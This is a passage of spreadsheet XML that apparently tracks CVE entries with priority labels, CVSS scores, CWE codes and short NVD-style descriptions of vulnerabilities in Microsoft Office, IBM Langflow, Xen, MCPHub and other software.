      <c r="D979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E979" s="5" t="inlineStr"/>
      <c r="F979" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="inlineStr"/>
      <c r="I979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J979" s="5" t="inlineStr"/>
      <c r="K979" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L979" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78504</t>
        </is>
      </c>
      <c r="C980" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E980" s="5" t="inlineStr"/>
      <c r="F980" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G980" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H980" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I980" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J980" s="5" t="inlineStr"/>
      <c r="K980" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L980" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78505</t>
        </is>
      </c>
      <c r="C981" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E981" s="5" t="inlineStr"/>
      <c r="F981" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G981" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H981" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I981" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J981" s="5" t="inlineStr"/>
      <c r="K981" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L981" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78507</t>
        </is>
      </c>
      <c r="C982" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E982" s="5" t="inlineStr"/>
      <c r="F982" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G982" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H982" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I982" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J982" s="5" t="inlineStr"/>
      <c r="K982" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L982" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78511</t>
        </is>
      </c>
      <c r="C983" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E983" s="5" t="inlineStr"/>
      <c r="F983" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G983" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H983" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J983" s="5" t="inlineStr"/>
      <c r="K983" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L983" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78512</t>
        </is>
      </c>
      <c r="C984" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E984" s="5" t="inlineStr"/>
      <c r="F984" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G984" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H984" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I984" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J984" s="5" t="inlineStr"/>
      <c r="K984" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L984" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78514</t>
        </is>
      </c>
      <c r="C985" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E985" s="5" t="inlineStr"/>
      <c r="F985" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G985" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H985" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I985" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J985" s="5" t="inlineStr"/>
      <c r="K985" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L985" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78517</t>
        </is>
      </c>
      <c r="C986" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E986" s="5" t="inlineStr"/>
      <c r="F986" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G986" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H986" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J986" s="5" t="inlineStr"/>
      <c r="K986" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L986" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78518</t>
        </is>
      </c>
      <c r="C987" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E987" s="5" t="inlineStr"/>
      <c r="F987" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G987" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H987" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J987" s="5" t="inlineStr"/>
      <c r="K987" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L987" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78519</t>
        </is>
      </c>
      <c r="C988" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E988" s="5" t="inlineStr"/>
      <c r="F988" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G988" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H988" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="I988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J988" s="5" t="inlineStr"/>
      <c r="K988" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L988" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78521</t>
        </is>
      </c>
      <c r="C989" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E989" s="5" t="inlineStr"/>
      <c r="F989" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G989" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H989" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I989" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J989" s="5" t="inlineStr"/>
      <c r="K989" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L989" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78524</t>
        </is>
      </c>
      <c r="C990" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E990" s="5" t="inlineStr"/>
      <c r="F990" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G990" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H990" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I990" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J990" s="5" t="inlineStr"/>
      <c r="K990" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L990" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78525</t>
        </is>
      </c>
      <c r="C991" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E991" s="5" t="inlineStr"/>
      <c r="F991" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G991" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H991" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I991" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J991" s="5" t="inlineStr"/>
      <c r="K991" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L991" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78526</t>
        </is>
      </c>
      <c r="C992" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E992" s="5" t="inlineStr"/>
      <c r="F992" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G992" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H992" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J992" s="5" t="inlineStr"/>
      <c r="K992" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L992" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78569</t>
        </is>
      </c>
      <c r="C993" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E993" s="5" t="inlineStr"/>
      <c r="F993" s="5" t="inlineStr"/>
      <c r="G993" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H993" s="5" t="inlineStr"/>
      <c r="I993" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J993" s="5" t="inlineStr"/>
      <c r="K993" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L993" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow an authenticated attacker to execute arbitrary code due to an incomplete denylist in the security scanner.</t>
        </is>
      </c>
      <c r="M993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78569</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78571</t>
        </is>
      </c>
      <c r="C994" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E994" s="5" t="inlineStr"/>
      <c r="F994" s="5" t="inlineStr"/>
      <c r="G994" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H994" s="5" t="inlineStr"/>
      <c r="I994" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J994" s="5" t="inlineStr"/>
      <c r="K994" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L994" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an unguarded eval() call on attacker-controlled input.</t>
        </is>
      </c>
      <c r="M994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78571</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78575</t>
        </is>
      </c>
      <c r="C995" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E995" s="5" t="inlineStr"/>
      <c r="F995" s="5" t="inlineStr"/>
      <c r="G995" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H995" s="5" t="inlineStr"/>
      <c r="I995" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J995" s="5" t="inlineStr"/>
      <c r="K995" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L995" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary commands due to improper validation of command-line arguments in the MCP stdio server configuration.</t>
        </is>
      </c>
      <c r="M995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78575</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78834</t>
        </is>
      </c>
      <c r="C996" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E996" s="5" t="inlineStr"/>
      <c r="F996" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="inlineStr"/>
      <c r="I996" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J996" s="5" t="inlineStr"/>
      <c r="K996" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L996" s="5" t="inlineStr">
        <is>
          <t>A code execution vulnerability exists in CMSimple 5.22 in the CoAuthors plugin. An authenticated low-privileged user who can modify page content and provide controlled imported content can trigger server-side execution by referencing crafted external or uploaded text content through the affected content import feature.</t>
        </is>
      </c>
      <c r="M996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79376</t>
        </is>
      </c>
      <c r="C997" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E997" s="5" t="inlineStr"/>
      <c r="F997" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="inlineStr"/>
      <c r="I997" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-20</t>
        </is>
      </c>
      <c r="L997" s="5" t="inlineStr">
        <is>
          <t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="M997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79423</t>
        </is>
      </c>
      <c r="C998" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E998" s="5" t="inlineStr"/>
      <c r="F998" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="inlineStr"/>
      <c r="I998" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L998" s="5" t="inlineStr">
        <is>
          <t>An authenticated remote code execution (RCE) vulnerability in the admin_config.php component of seacms v13.6 allows attackers to execute arbitrary code via a crafted POST request.</t>
        </is>
      </c>
      <c r="M998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79423</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79602</t>
        </is>
      </c>
      <c r="C999" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E999" s="5" t="inlineStr"/>
      <c r="F999" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="inlineStr"/>
      <c r="I999" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="L999" s="5" t="inlineStr">
        <is>
          <t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t>
        </is>
      </c>
      <c r="M999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79742</t>
        </is>
      </c>
      <c r="C1000" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1000" s="5" t="inlineStr"/>
      <c r="F1000" s="5" t="inlineStr"/>
      <c r="G1000" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1000" s="5" t="inlineStr"/>
      <c r="I1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1000" s="5" t="inlineStr"/>
      <c r="K1000" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1000" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an incomplete environment variable blocklist.</t>
        </is>
      </c>
      <c r="M1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79742</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79744</t>
        </is>
      </c>
      <c r="C1001" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1001" s="5" t="inlineStr"/>
      <c r="F1001" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="inlineStr"/>
      <c r="I1001" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1001" s="5" t="inlineStr"/>
      <c r="K1001" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="L1001" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.29, MCPHub's PUT /api/system-config endpoint (handler updateSystemConfig) performs no authorization check. It is protected only by the app-wide authentication middleware and a rate limiter — it never inspects req.user.isAdmin. This issue has been patched in version 1.0.29.</t>
        </is>
      </c>
      <c r="M1001" s="6" t="inlineStr">
